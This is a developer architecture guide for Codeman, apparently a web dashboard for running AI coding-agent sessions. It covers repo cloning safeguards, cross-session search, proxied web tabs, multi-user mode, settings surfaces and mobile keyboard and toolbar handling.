**Clone a repository as a case** (issue #236, Add Case → **Clone Repo**): `POST /api/cases/clone` clones a public repo into the caller's case space synchronously (request held open, bounded by `GIT_CLONE_TIMEOUT_MS`, no job store); `POST /api/cases/clone-preflight` reports whether the URL can be cloned anonymously plus its real branches/tags. Core in `src/git-clone.ts`. ⚠️ **The URL is a code-execution surface**: `ext::sh -c <cmd>` (and ANY `<name>::<payload>` helper) makes git run a command, so every `::` form is refused, a leading `-` is refused, and every spawn is an argv array with `--` before the operands. ⚠️ **Non-interactive or the open request hangs** — `gitNonInteractiveEnv()` closes the terminal/askpass/ssh/GCM prompt paths; `HOME`/`PATH` stay inherited, so a user's OWN credential helper may authenticate (Codeman still never collects or stores credentials, and refuses a `user:password@` URL). ⚠️ Timeout kills the process GROUP (clone fans out into child processes), the destination is removed only if this attempt created it, and repository contents win over scaffolding (existing `CLAUDE.md` kept, hooks merged, repo-shipped `.claude/settings*` reported as a warning since its hooks run locally). The **Brain** picker sets the toolbar run mode on success. → [architecture-invariants#clone-a-repository-as-a-case](docs/architecture-invariants.md#clone-a-repository-as-a-case)
|
||||
|
||||
**Cross-session search**: `GET /api/search` federates an in-memory search over session metadata, run-summary events, and attachment-history entries. The pure core `searchSources()` does substring matching with hard per-type caps: **no regex (so no ReDoS) and no filesystem reads (so no traversal)**. The server-private `externalPath` is never read. PAST sessions (#261) come from `session-history-index.ts`, a capped snapshot of the unified list filled **outside** the request path (`/api/sessions/unified` publishes it; a stale one is rebuilt fire-and-forget), that indirection is what keeps the no-fs property. ⚠️ The snapshot is stored UNSCOPED with a per-row owner and MUST be re-filtered through `canAccessOwned()` on read; history rows carry `jumpTo.kind:'resume-session'`, since a closed session has no tab to select. → [architecture-invariants#cross-session-search](docs/architecture-invariants.md#cross-session-search)
|
||||
|
||||
**Web tabs** (dashboard URLs as tabs): a saved URL renders as a tab beside agent sessions. **NOT a sixth `SessionMode`** (no PTY, no tmux, no respawn), same reasoning that keeps Docker/remote-SSH as case overlays. Dashboards are **proxied through Codeman's own origin** by default, because a direct iframe fails three ways at once: prod is HTTPS so `http://` targets are blocked as mixed content, many dashboards send `X-Frame-Options: DENY`, and our own `default-src 'self'` CSP blocks cross-origin frames. Proxying leaves the prod CSP unchanged (`/webview/...` is `'self'`). ⚠️ The proxy is **NOT an API surface**: it authenticates on an in-memory capability in the path and is correspondingly exempt from the cookie + Origin checks; that exemption is fenced to safe methods and non-`/api` paths and is pinned by `test/webview-auth-exemption.test.ts`. ⚠️ Iframes omit `allow-same-origin` unless a dashboard is explicitly marked `trusted`, and `Authorization`/`codeman_session` are stripped upstream in **both** modes so `CODEMAN_PASSWORD` cannot leak. ⚠️ A sandboxed frame is **opaque-origin**, which breaks two things `curl` can never reproduce: its runtime-built root-absolute URLs escape `<base>` (fixed by an injected `runtimeUrlShim()`), and its same-host `fetch`/XHR are CORS-checked with `Origin: null` (fixed by `buildProxyCorsHeaders()` plus exempting the proxy from the global `OPTIONS`-204 short-circuit in `registerSecurityHeaders`). Both present as the dashboard's own "Failed to fetch" while the page renders fine. → [architecture-invariants#web-tabs](docs/architecture-invariants.md#web-tabs), `docs/web-tabs.md`
|
||||
|
||||
**Multi-user mode** (opt-in `--multiuser` / `CODEMAN_MULTIUSER=1`, OFF by default): named users with scrypt-hashed passwords in `~/.codeman/users.json`. Gated everywhere by `isMultiUserMode()`; when OFF, behavior is byte-identical to single-user because every scoping helper short-circuits. ⚠️ **Not a security boundary at the agent layer**: every session still runs as the SAME OS account. This separates WORKSPACES; it does not sandbox users (Docker cases are the isolation story). Ownership threads through `Session.owner` and is enforced in `findSessionOrFail`, list endpoints, SSE routing (fail-closed), WS, search, and file-preview. → [architecture-invariants#multi-user-mode](docs/architecture-invariants.md#multi-user-mode), `docs/multi-user-plan.md`
|
||||
|
||||
**Away digest**: `GET /api/away-digest` aggregates what happened while you were away from the lifecycle log, run-summary events, live sessions, token stats, and recent subagents. Pure aggregator in `web/away-digest.ts`. ⚠️ Returns `{success:true,digest}`, a legacy raw-ish shape consistent with the other raw GET handlers in `system-routes.ts`; frontend and tests read `.digest`. → [architecture-invariants#away-digest](docs/architecture-invariants.md#away-digest)
|
||||
|
||||
**Ralph todo-config**: per-session `maxTodos` (FIFO-eviction cap, default 500 = `MAX_TODOS_PER_SESSION`) + `todoExpirationMinutes` (auto-expiry, default 60) set via `POST /api/sessions/:id/ralph-config` (`RalphConfigSchema`, both `.int().positive()`). Stored on the tracker (`setMaxTodos`/`setTodoExpirationMinutes`) and **persisted/read-back via `RalphTrackerState`** (surfaced in the `loopState` getter → `toState()` + SSE broadcast → modal `populateRalphForm`), mirroring how `maxIterations` round-trips. Claude-only (skipped by `isExternalCliMode`).
|
||||
|
||||
**Port interfaces**: Routes declare dependencies via port interfaces (`src/web/ports/`). Routes use intersection types (e.g., `SessionPort & EventPort`).
|
||||
|
||||
### Frontend
|
||||
|
||||
Frontend JS modules have `@fileoverview` with `@dependency`/`@loadorder` tags. Load order: `constants.js`(1) → `mobile-handlers.js`(2) → `voice-input.js`(3) → `notification-manager.js`(4) → `keyboard-accessory.js`(5) → `input-cjk.js`(5.5) → `sanitize-html.js`(5.6) → `app.js`(6) → `terminal-ui.js`(7) → `respawn-ui.js`(8) → `ralph-panel.js`(9) → `orchestrator-panel.js`(9.5) → `settings-ui.js`(10) → `panels-ui.js`(11) → `session-ui.js`(12) → `ralph-wizard.js`(13) → `api-client.js`(14) → `subagent-windows.js`(15) → `image-input.js`(16). `input-cjk.js` handles CJK IME composition via an always-visible textarea below the terminal (`window.cjkActive` blocks xterm's onData).
|
||||
Frontend JS modules have `@fileoverview` with `@dependency`/`@loadorder` tags. Load order: `constants.js`(1) → `i18n.js`(1.5) → `mobile-handlers.js`(2) → `voice-input.js`(3) → `notification-manager.js`(4) → `keyboard-accessory.js`(5) → `input-cjk.js`(5.5) → `sanitize-html.js`(5.6) → `app.js`(6) → `terminal-ui.js`(7) → `respawn-ui.js`(8) → `ralph-panel.js`(9) → `orchestrator-panel.js`(9.5) → `cron-ui.js`(9.7) → `settings-ui.js`(10) → `panels-ui.js`(11) → `readmymind-ui.js`(11.3) → `ultracode-panel.js`(11.5) → `approvals-ui.js`(11.6) → `admin-ui.js`(11.7) → `session-ui.js`(12) → `webview-tabs.js`(12.5) → `mobile-overview.js`(12.55) → `home-sessions.js`(12.56) → `entrance-animations.js`(12.6) → `ralph-wizard.js`(13) → `api-client.js`(14) → `subagent-windows.js`(15) → `ultracode-windows.js`(15.5) → `image-input.js`(16). `i18n.js` translates static + newly inserted application DOM while skipping terminal/response/file/user-name surfaces; `input-cjk.js` handles CJK IME composition via an always-visible textarea below the terminal (`window.cjkActive` blocks xterm's onData).
|
||||
|
||||
**Z-index layers**: subagent windows (1000), plan agents (1100), mobile/tablet fixed header (1200, `mobile.css`), modals on ≤768px (1300 — must beat the fixed header or the modal close button is buried; bug fixed in `b8cb467`), log viewers (2000), image popups (3000), local echo overlay (7).
|
||||
**Entrance animations** (`entrance-animations.js`, all OFF by default): opt-in animations for the four things that appear when work starts, chosen per surface via `data-tab-anim` / `data-term-anim` / `data-win-anim` / `data-line-anim` on `<html>`. Defaults are the `legacy` theme, so an untouched install behaves exactly as before and every hook short-circuits on its first line. ⚠️ Tabs and connection lines are **destroyed mid-animation** on every re-render (`_fullRenderSessionTabs()` replaces the strip's innerHTML; `_updateConnectionLinesImmediate()` does `svg.innerHTML = ''`), so both are tracked by id and re-applied to the fresh element with a **negative `animation-delay`** to resume rather than restart. ⚠️ The terminal-pane styles may animate **transform / opacity / clip-path only**, xterm's FitAddon derives rows+cols from `getComputedStyle(parent).width/height`, so animating width/height/padding there would resize the PTY. ⚠️ Window styles other than `beam` transform the window, which moves the rect its connection line is aimed at; `beam` deliberately animates opacity/filter only so its line can draw toward a stable target. Persisted to its own `codeman:*Anim` localStorage keys (per-device, deliberately NOT in the `.strict()` `SettingsUpdateSchema`); picker in App Settings → Appearance, full per-surface lab at `?animlab=1`.
|
||||
|
||||
**Multi-monitor button** (header, top-right; the notification bell it sits beside stays hidden — notifications live in Settings → Notifications). `app.launchMultiMonitor()` (in `panels-ui.js`) POSTs `/api/system/span-displays`, which spawns `scripts/span-codeman.sh` — a fresh, maximized browser `--app` window sized to the union of all displays (macOS; needs "Displays have separate Spaces" OFF). Supports the gesture layer's in-page floating session panels dragging across the physical monitor seam. **Opt-in:** hidden by default; enable under App Settings → Display → **Header Displays** ("Multi-monitor Button", `showMultiMonitorButton`). The button carries a `btn-multimonitor--hidden` class in the template; `renderIndexHtml` strips that class at render when the setting is on (a unique class token, not a brittle match on the aria-label/style copy), and `applyHeaderVisibilitySettings()` toggles the same class live on save. Solo (detached) windows hide it via `body.solo-mode`.
|
||||
**Mobile tab strip scrolling** (issue #257): under 768px the tab strip is a horizontal scroller (desktop wraps to a second row instead), so the active tab can sit off-screen. Three rules keep it reachable and they only work together: `_updateActiveTabImmediate()` scrolls the selected tab into view via `computeTabScrollLeft()` (pure, in constants.js) using **rect math on the strip's own `scrollLeft`**, never `scrollIntoView()`, which would also scroll the document under a fixed header; `_fullRenderSessionTabs()` **restores `scrollLeft`** across the `innerHTML` rebuild, since ambient rebuilds (a task badge appearing, a session created elsewhere) otherwise snap a mid-swipe strip back to 0; and it re-reveals the active tab **only when it changed** (`_lastRenderedActiveTabId`), so browsing the far end of the strip is not undone by background renders. ⚠️ Mobile no longer hoists the active session to the front of the strip: that reordering ran on full renders only, so tab order flipped depending on which render path fired, and it renumbered the Alt+N badges. Scroll-into-view replaces it; do not reintroduce it.
|
||||
|
||||
**Response-viewer (eye) button** (header) is likewise **hidden by default** — enable under App Settings → Display → **Response Viewer** (`showResponseViewer`). Purely client-side (no `renderIndexHtml` step): the template ships with `btn-response-viewer-header--hidden` and `applyHeaderVisibilitySettings()` (settings-ui.js) toggles it after settings load. Hiding must go through that marker class — the base rule is `display:inline-flex !important`, so an inline style can't override it. `showResponseViewer` is in the `displayKeys` per-device set (settings-ui.js), so it does NOT sync across devices.
|
||||
**Phone overview home screen** (`mobile-overview.js`, phones only, per-device `mobileOverviewEnabled`, default ON): under 430px the "C" logo shows a session overview (NEEDS YOU / CURRENT SESSIONS / PAST SESSIONS) instead of the welcome overlay; tablet and desktop are unchanged. The branch lives in `showWelcome()`/`hideWelcome()` (terminal-ui.js) behind `shouldUseMobileOverview()`, which is **width-driven** (`getDeviceType() === 'mobile'`) because this is a layout decision, unlike the settings namespace which stays handheld-based. ⚠️ The container ships with the `hidden` attribute and only this module removes it: never give `.mobile-overview` a bare `display` rule, since desktop does not load `mobile.css` (`media="(max-width: 1023px)"`) and would then render it unstyled. Live re-renders ride on the tail of `_renderSessionTabsImmediate()` (every state change it needs already funnels there); PAST rows come from one `_fetchUnifiedSessions(60)` per home-screen visit and resume through the shared `resumeHistorySession()`, so they behave exactly like the welcome screen's Resume list. ⚠️ Two things must stay in lockstep with surfaces outside this module, because divergence reads as a bug rather than a style: the split Run button carries the **toolbar's own classes** (`btn-toolbar btn-run mode-<backend>` / `btn-run-gear`) so the per-backend gradient and the light-skin overrides apply unchanged (mobile.css must therefore set no `background`/`color` on it), and row status uses the **session-tab language** (green dot when fine, `pulse` while working, yellow blinking row when waiting for input, red blinking row when a question is pending, mirroring `tab-alert-idle`/`tab-alert-action`). The picker mirrors the toolbar run-mode menu (`setRunMode()` + `run()`, `openWebviewFromMenu()` for saved dashboards) and deliberately omits its Recent-Sessions block, since PAST SESSIONS is that. Status pills carry `data-i18n-skip` (generic words like "idle" collide with state strings elsewhere).
|
||||
|
||||
**Gesture control** (the camera hand-tracking overlay) is **opt-in, default OFF**, under App Settings → Display → **Input** (`gestureControlEnabled`). `CODEMAN_GESTURE=1` makes the feature *available* on the instance (CSP widening + `/gesture/` assets) and sets `window.__codemanGestureAvailable` (the Input section only shows when set); the overlay bundle is injected by `renderIndexHtml` **only when the setting is enabled**, so that method is `async` and reads `settings.json` via `readSettings(true)` — the `true` forces a **fresh** read (bypassing the 2s `_settingsCache`), because a post-save reload happens within that TTL and the cached value would otherwise render the pre-toggle state. Toggling the setting reloads the page (the bundle is render-injected).
|
||||
**Desktop home tab rail** (`home-sessions.js`, desktop only): the welcome overlay centers ~560px of content in a ~1400px window, so its left gutter is dead space; it carries the open tabs as a rail **docked flush to the left edge, full height** (a vertically centered card floating mid-gutter read as debris). Rows are in **tab order**, not sorted by urgency like the phone overview, because the row badges are the Alt+1..9 indices, and each carries **created / last-active** stamps. State classification is REUSED from mobile-overview.js (`_mobileOverviewState`/`_mobileOverviewCaseFor`), which is why the module loads after it. ⚠️ The rail is `position: absolute` so the centered content never moves, which is exactly why it needs a **width gate in two places** — `HOME_SESSIONS_MIN_WIDTH` (1180) in the JS plus a `max-width: 1179px` media query as the backstop for a resize that outruns the matchMedia listener; drift between them means a rail overlapping the search panel, and `test/home-sessions.test.ts` pins them equal. ⚠️ `.home-sessions` is `display: flex`, so `[hidden]` must be re-asserted as `display: none` or the module's only visibility lever does nothing. ⚠️ Size scales with the viewport off **one knob**: `width: clamp(250px, 19vw, 430px)` plus a fluid `font-size` on `.home-sessions`, with every child sized in `em` — reintroducing `rem`/px type inside the block silently breaks the scaling, and widening the clamp past the gutter reintroduces the overlap the gate exists to prevent. The age stamps are refreshed **in place** by a 20s clock (`_tickHomeSessionsTimes()`, disarmed in `hideHomeSessions()`), never by re-rendering, which would restart every row's blink and working ring. Working state is deliberately byte-identical to the phone's: pulsing green dot + the `tab-load-spin` ring reused from the tab strip + the same green halo (added to `.mobile-overview-dot--working` at the same time), so "working" reads the same on every surface; **idle** is deliberately NOT that green — dot and pill mix toward `--text-muted` so a glance separates running from sitting. Live re-renders ride the tail of `_renderSessionTabsImmediate()` alongside the phone overview.
|
||||
|
||||
**Gesture-control source lives in-repo** at `packages/gesture-control/` (workspace package `codeman-gesture-control`, was the standalone `Ark0N/codeman-gesture-control` repo). The transport-agnostic core is `src/gesture/*` (MediaPipe GestureRecognizer → One-Euro-filtered cursor → pinch state machine); `src/codeman/entry.ts` is the Codeman *consumer* that maps grab/drag/drop onto real `.session-tab`/toolbar buttons and is the bundle entry. **Edit there, then run `npm run build:gesture`** (`scripts/build-gesture-bundle.mjs` → esbuild bundles `entry.ts`, MediaPipe JS included, into `src/web/public/gesture/gesture-codeman.js`) and **commit the regenerated bundle** — the committed bundle is what dev/`tsx` serves (no bundler at runtime), and `scripts/build.mjs` reruns the same step so prod always reflects current source. The MediaPipe **wasm + model** are NOT bundled — loaded at runtime from same-origin `/gesture/wasm` + `/gesture/gesture_recognizer.task`, fetched by `scripts/fetch-gesture-assets.mjs` (gitignored, see Gotchas). `entry.ts` mounts `window.__codemanGesture = new GestureBridge()` idempotently at module-eval. A standalone vite playground (`npm run dev` in the package — fake tabs, no Codeman) lets you iterate on gesture *feel* in isolation. ⚠️ Keep `MP_VERSION` in `fetch-gesture-assets.mjs` in sync with `@mediapipe/tasks-vision` in `packages/gesture-control/package.json`.
|
||||
**Welcome "Resume Conversation" list** (terminal-ui.js): `loadHistorySessions()` fetches once and caches the corpus on `_historyAll`/`_historyCases`; every subsequent view (filter box, sort select, expand, the periodic refresh in panels-ui.js) goes through `_renderHistoryList()`, so never append rows to `#historyList` directly or re-fetch to re-sort. ⚠️ The box height is **class-driven**: expanding the list without `.history-list.expanded` leaves the collapsed `max-height` in place and just deepens a scroll well, which is the bug #260 reported (35 sessions in a ~4-row box). ⚠️ The A–Z sort keys off `_historyRowLabel()`, the SAME string the row renders (`name || firstPrompt || path`), most rows are transcript-backed and have no session name, so sorting on `name` alone silently does nothing. ⚠️ A filter implies expansion, and `_renderSearch()` hides `#historyHeader` (title + controls) as one unit while a search is active. Tests: `test/history-list-controls.test.ts`.
|
||||
|
||||
**Theme skins** (App Settings → Display): the `skin` setting selects a palette via a `data-skin` attribute on `<html>`. Values: `daylight-blue` (default), `daylight-green`, `og` (OG Codeman). CSS lives under `[data-skin="…"]` blocks in `styles.css`. To avoid a flash-of-wrong-theme, an **inline pre-paint script** in `index.html` (`<head>`) reads `localStorage['codeman:skin']` and sets `data-skin` before first paint; `settings-ui.js` `applyTheme()`/`applyTerminalSkin()` apply it live on save and keep the standalone `codeman:skin` key + the settings object in sync. `skin` is a **per-device/client-only** setting — it's destructured OUT of the server payload (settings-ui.js, alongside `localEchoEnabled`/`cjkInputEnabled`/`extendedKeyboardBar`), so it does NOT sync across devices.
|
||||
**Command palette + shortcut registry**: `Ctrl/Cmd/Alt+K` opens the session palette; shortcuts live in a rebindable registry (`DEFAULT_SHORTCUTS`/`getShortcutRegistry()`/`matchesShortcutEvent()` in app.js, overrides in `settings.shortcutOverrides`). ⚠️ Palette-chord keys must ALSO be swallowed in `attachCustomKeyEventHandler` (terminal-ui.js) or xterm writes the control byte (0x0B) into the PTY. ⚠️ `saveAppSettings()` rebuilds settings from the DOM, so keys edited elsewhere (`shortcutOverrides`, `showTokenCount`, `showCost`) need explicit `_prev` carry-over. ⚠️ **Smart copy (`Ctrl+C`)** lives in that same handler: with a selection it copies, with none it must `return true` **without** `preventDefault()` or the interrupt is lost. `copyTerminalSelection` is deliberately absent from `SHORTCUT_ACTIONS` because the generic capture loop preventDefaults every match it dispatches. → [architecture-invariants#command-palette-and-shortcut-registry](docs/architecture-invariants.md#command-palette-and-shortcut-registry)
|
||||
|
||||
**Per-device vs synced settings**: the `displayKeys` set in settings-ui.js is a **client-side merge policy**, not a wire filter. A display key seeds from the server only when localStorage has no value for it, which is what prevents one device overwriting another; `showPlanUsageLimits` is additionally `delete`d from the incoming payload outright. Separately, `SettingsUpdateSchema` is `.strict()` and simply **does not declare** `skin`, `showFileViewerButton`, `showCronButton`, `webglRendererEnabled`, `localEchoEnabled`, `cjkInputEnabled`, or `extendedKeyboardBar`, so sending one of those is a validation error. The rest (`showResponseViewer`, `showPlanUsageLimits`, `language`, and most `show*` keys) ARE in the schema and do persist server-side; they are per-device by client policy only. ⚠️ Adding a new per-device setting means deciding **both** questions: membership in `displayKeys`, and presence in the schema.
|
||||
|
||||
**Settings surface** (`#appSettingsModal` + `#sessionOptionsModal` + `#createCaseModal`): the `set-*` language (left rail, groups of rows, control pinned right) is shared by all three modals through ONE `:is(#appSettingsModal, #sessionOptionsModal, #createCaseModal)` scope in styles.css: an `:is()` list takes its most specific argument's specificity, so every rule keeps the id weight it had and nothing downstream shifts. **App Settings** is a rail that is a **table of contents over ONE scrolling document**, not a tab switcher: every section stays mounted (`.set-section`, ids `settings-updates|terminal|layout|appearance|models|clis|notifications|voice|shortcuts|system`, in that order, the version and the updater leading and the rest of the system settings tailing), and `switchSettingsTab(id)` keeps its historical name but SCROLLS instead of hiding. **Session Options** and **Add Case** use the same surface with a rail that really SWITCHES (`switchOptionsTab` / `switchCaseModalTab` show one `.set-section` and `.hidden` the rest, since Summary owns its own scroller, Respawn is long, and Add Case is six independent forms). ⚠️ They also take a deliberate **size-up** that App Settings does not (900px shell, 236px rail, `height:auto` between `min(560px,80vh)` and 88vh, vs App Settings' tight 760×620): they are short task panels, not a document you scan, and at scanning density they read as a few fields marooned in an empty frame. Those per-modal blocks are the design, not drift. Phones (≤860px) give App Settings the sticky `#appSettingsJump` pill and give the other two a horizontal rail strip, which neither has a pill for. ⚠️ The Session Options rail entry labelled **Session** still keys off `context` (`data-tab="context"`, `#context-tab`, `switchOptionsTab('context')`), the rename is label-only. Add Case keeps its legacy `.form-row` markup (six panels of it, every id read back by session-ui.js) and is mapped onto the look by an adapter block scoped to `#createCaseModal .set-doc`. Do not restructure those forms just to reach the row classes. ⚠️ That adapter's `summary { display:flex }` **kills the native disclosure triangle**, so every `<details>` there needs the explicit `.set-adv-chev` and both marker suppressions (`list-style` + `::-webkit-details-marker`); without it five collapsed blocks render as plain headings nobody clicks. ⚠️ **The load/save contract is `getElementById` by id**: `openAppSettings()`/`saveAppSettings()`/`openSessionOptions()` read every control by a fixed id, so moving a control between sections is free but renaming or dropping one silently stops it loading or saving. Static guards: `test/app-settings-structure.test.ts` + `test/session-options-structure.test.ts` (rail↔section pairing, one-visible-section, the `data-claude-only` entries external CLIs drop). ⚠️ Model cards (`#appSettingsModelCards`) and the effort segment are **views over hidden `<select>`s** that remain the source of truth; the cards hold the BASE model and the "1M context window" switch composes `base + [1m]` back into `claudeModel`, which is what retires the old "takes precedence over the toggle below" trap. ⚠️ `.modal-tabs`/`.modal-tab-btn`/`.modal-tab-content` are RETIRED: no modal uses them and their CSS is deleted, and a reappearance means a modal drifted off the shared surface. ⚠️ The **Header & Panels live preview** is a scale model rebuilt from the chips (`_syncLayoutPreview`); it owns NO icons, it CLONES `.set-chip-ico` out of the chip, so each icon has exactly one copy in index.html. A chip joins it via `data-preview` (slot) + `data-preview-order`, or `data-preview-text` for readouts that are not buttons. Its frame is painted from skin tokens only (hardcoded black alphas turned it into a grey slab on the light skins) and is `data-i18n-skip`. ⚠️ In Session Options → Respawn, auto-resume is a `.set-callout` whose `<label>` **wraps its own switch with no `for=`** (nesting associates them; the label+`for` pair has historically double-fired), and the cycle steps are real checkboxes (`.set-checks`), not chips. ⚠️ `admin-ui.js` injects the multi-user Users entry into `.set-rail-items` + `.set-doc`, so those hooks must survive any restructure. → [architecture-invariants#settings-surface-app-settings-session-options-add-case](docs/architecture-invariants.md#settings-surface-app-settings-session-options-add-case)
|
||||
|
||||
**Header button visibility**: most header controls are opt-in and hidden by a marker class (`btn-multimonitor--hidden`, `btn-response-viewer-header--hidden`, `btn-file-viewer--hidden`, `btn-cron--hidden`) that `applyHeaderVisibilitySettings()` (settings-ui.js) toggles after settings load; the multi-monitor button is instead stripped at render by `renderIndexHtml`. ⚠️ Hiding must go through the marker class: the base rules are `display:inline-flex !important`, so an inline style cannot override them. Current desktop default is WS/CPU/MEM + File Viewer + gear, with the token chip and lifecycle-log button OFF. ⚠️ New header controls must not leak onto phones; `test/mobile-header-buttons-policy.test.ts` is the static guard. → [architecture-invariants#header-button-visibility-multi-monitor-response-viewer-file-viewer-cron](docs/architecture-invariants.md#header-button-visibility-multi-monitor-response-viewer-file-viewer-cron)
|
||||
|
||||
**Gesture control** (camera hand-tracking overlay, opt-in, default OFF): `CODEMAN_GESTURE=1` makes the feature *available*; `gestureControlEnabled` turns it on. The bundle is injected by `renderIndexHtml` only when enabled, which is why that method is `async` and reads settings with `readSettings(true)` (a fresh read: a post-save reload lands inside the 2s cache TTL and would otherwise render the pre-toggle state). **Source lives in `packages/gesture-control/`; edit there, run `npm run build:gesture`, and commit the regenerated bundle** because dev serves the committed bundle with no runtime bundler. The MediaPipe wasm + model are fetched separately and gitignored. ⚠️ Keep `MP_VERSION` in `fetch-gesture-assets.mjs` in sync with `@mediapipe/tasks-vision`. → [architecture-invariants#gesture-control-the-source-package](docs/architecture-invariants.md#gesture-control-the-source-package)
|
||||
|
||||
**Theme skins / branding / i18n**: `skin` selects a palette via `data-skin` on `<html>`, applied by an **inline pre-paint script** in `index.html` reading `localStorage['codeman:skin']` to avoid a flash of wrong theme. ⚠️ A skin is **four things that must stay in sync**, and missing any one degrades silently: the `html[data-skin="…"]` token block in `styles.css`, the xterm ANSI palette in `terminal-ui.js`, the pre-paint allowlist, and the Settings picker (both in `index.html`). `test/skin-themes.test.ts` is the static guard. Light skins additionally need `color-scheme: light` and xterm `minimumContrastRatio: 4.5`, and `applyTerminalSkin()` must call the local-echo overlay's `refreshFont()` because it caches the terminal fg/bg. `displayName` changes user-facing browser branding only and must NEVER rename npm package, CLI, API, storage, CSS, or protocol identifiers. `language` (`en`/`zh-CN`) keeps English as the canonical source so live switching stays reversible. User display names flow through `textContent`/attribute APIs and the server title's HTML escaper, never `innerHTML`. → [architecture-invariants#theme-skins](docs/architecture-invariants.md#theme-skins)
|
||||
|
||||
**Foldable settings identity**: responsive layout is width-driven via `MobileDetection.getDeviceType()`, but the localStorage namespace uses `MobileDetection.isHandheldDevice()` so an unfolded Android foldable keeps `codeman-app-settings-mobile`. ⚠️ Do not switch per-device settings namespaces from instantaneous viewport width: a posture-triggered WebView reload would lose opt-in UI. Regression profile: `OPPO Find N5 (unfolded)` in `test/mobile/devices.ts`. → [architecture-invariants#foldable-settings-identity](docs/architecture-invariants.md#foldable-settings-identity)
|
||||
|
||||
**WebGL renderer toggle** (`webglRendererEnabled`, per-device): the GPU-stall watchdog's sticky `codeman-webgl-disabled` marker survives page loads and is cleared only by an explicit OFF→ON save or `?webgl=force`. `?nowebgl` forces the DOM renderer per-load. → [architecture-invariants#webgl-renderer-toggle](docs/architecture-invariants.md#webgl-renderer-toggle)
|
||||
|
||||
**Shell keyboard accessory bar + one-shot Ctrl** (issue #262, `keyboard-accessory.js`): a **shell**-mode session automatically swaps the mobile accessory bar for terminal controls (Ctrl, Esc, Tab, four arrows, paste, dismiss); every other mode keeps the agent bar. `setMode()` now records the user's `extendedKeyboardBar` preference as the **base** layout and `refreshForActiveSession()` (called from `selectSession`) resolves base-vs-shell, so a settings save during a shell session cannot yank the bar away and switching back restores the user's choice. ⚠️ **Ctrl is a ONE-SHOT modifier applied in `terminal.onData`, not in a keydown handler**: a virtual keyboard emits no usable key events, so the character only exists as onData text. The hook sits AFTER `shouldSuppressTerminalQueryResponse` (xterm answers DA/CPR through onData too, and one of those would silently spend the modifier) and BEFORE every send path, so the control byte follows the normal control-char route. ⚠️ **Not every onData chunk is a keystroke**, and the query filter is not enough on its own: xterm ALSO emits mouse and focus reports on its own initiative, so the hook skips them via `isTerminalFocusOrMouseReport()` (they still reach the PTY, they just don't count as the next key). The mouse half is live — a shell session keeps the NARROW strip, so mouse DECSETs reach the browser and one tap while vim/htop runs spent the armed modifier silently (measured). The focus half is defense in depth: `FOCUS_ESCAPE_FILTER` in `session.ts` strips `\x1b[?1004h` from every PTY read, so `sendFocusMode` never turns on today; if it ever did, the bar's own post-key refocus would emit `\x1b[I` and eat the modifier before the user typed. ⚠️ It must disarm on ALL of: use, second tap, any other accessory key, session switch, keyboard dismissal, and a layout swap; a modifier left armed turns the next innocent keystroke into a control byte. ⚠️ **onData is not the only input path** — with `cjkInputEnabled` on, the CJK textarea owns the keyboard (onData returns early for everything it swallows, and the focus router sends `terminal.focus()` there, which is where the bar refocuses after every key), so `_handleCjkInput()` applies the modifier too. It is that module's single choke point to the PTY, so one call covers typed characters, IME flushes, Enter, backspace and arrows. Without it an armed modifier could neither fire NOR be spent, and survived to a later keystroke. Mapping is `ctrlByteFor()` (`code & 0x1f` over @A-Z[\]^_ and a-z, plus Ctrl+Space=NUL / Ctrl+?=DEL); characters with no control equivalent pass through unchanged, like a hardware keyboard. ⚠️ The armed style is `.accessory-btn.accessory-btn-ctrl.armed` (0,3,0) in BOTH stylesheets, and it cannot outrank mobile.css's light-skin repaint at **(0,3,1)** (`:is()` inherits its most specific argument, and that list holds `.btn-toolbar.btn-shell`) — so that rule excludes the state by hand as `.accessory-btn:not(.armed)`. Without the exclusion the armed button renders identically to a resting one on all four light skins, which is worse than no armed style at all.
|
||||
|
||||
**Dismissing the on-screen keyboard** (PRs #279/#280, `terminal-ui.js`): the terminal parks focus on a hidden textarea that nothing used to release, so TWO gestures now blur it, and they own different regions. **(1)** `_installMobileKeyboardDismiss()` — a document-level `touchend` that fires only while the terminal input actually holds focus, **never inside `#terminalContainer`** (tap classification owns that) and **never on a control** (`MOBILE_KEYBOARD_DISMISS_EXEMPT_SELECTOR`, matched with `closest()` so an icon inside a button counts). Session tabs are covered by the selector's `[tabindex]:not([tabindex="-1"])` arm, which is what stops a tab tap from blurring and then being re-focused by `selectSession()`. **(2)** In `_handleMobileTerminalTap`, a second tap on **inert `content`** (`startedWithTerminalFocus`) blurs instead of re-focusing. ⚠️ Scoped to `content` on purpose: the prompt row (`input`) keeps focus-then-position so a second tap still places the caret, and actionable rows blur earlier via `_isActionableMobileTerminalTap`. ⚠️ **A scroll ends in `touchend` too** — dismissing there closes the keyboard and drops the composer mid-read, so travel is tracked from `touchstart` and multi-touch is never a tap. Both classifiers MUST share one threshold: `initTerminal`'s `TAP_THRESHOLD` reads `MOBILE_KEYBOARD_DISMISS_TAP_SLOP`, since a gesture the terminal calls a scroll and the dismiss handler calls a tap is exactly that bug. ⚠️ **`test:ci` excludes `test/mobile/**`, so CI cannot see the only test covering (1)** — run `npm test -- test/mobile/keyboard.test.ts` by hand and diff the FAIL list against master. That blind spot is why merging the two PRs, which conflicted semantically but not textually, produced a red suite with two green CI checks.
|
||||
|
||||
**Phone toolbar: Enter replaces Shell** (post-1.8.0): inside `@media (max-width: 430px)` `btn-shell` is `display:none` and `btn-enter` takes its slot (`order: 4`); starting a shell moved into the Run dropdown (`Terminal / Shell` → `setRunMode('shell')` → `run()` → `runShell()`, button label "Run SH"). `runMode` is `z.string().max(20)` server-side, so new modes need no schema change. Desktop and tablet keep the green Run Shell button unchanged.
|
||||
|
||||
⚠️ **`sendEnterKey()` MUST go through `terminal._core.coreService.triggerDataEvent('\r', true)`** — not `sendInput()`, and never a raw POST to `/api/sessions/:id/input`. `localEchoEnabled` defaults to `MobileDetection.isTouchDevice()`, so on every phone the characters you type are buffered in the `LocalEchoOverlay` and have **never reached the PTY**; the `onData` Enter branch in terminal-ui.js is what flushes `pendingText` first and only then sends `\r` (after an 80ms delay so text lands first). Sending a bare `\r` submits an empty line and strands the typed text on screen, so the button looks dead. Replaying the keypress reuses the overlay flush, the flushed-offset cleanup and the ordering instead of reimplementing them. `KeyboardAccessory.sendKey()` is for escape sequences (arrows/Esc) and is the WRONG template to copy for input.
|
||||
|
||||
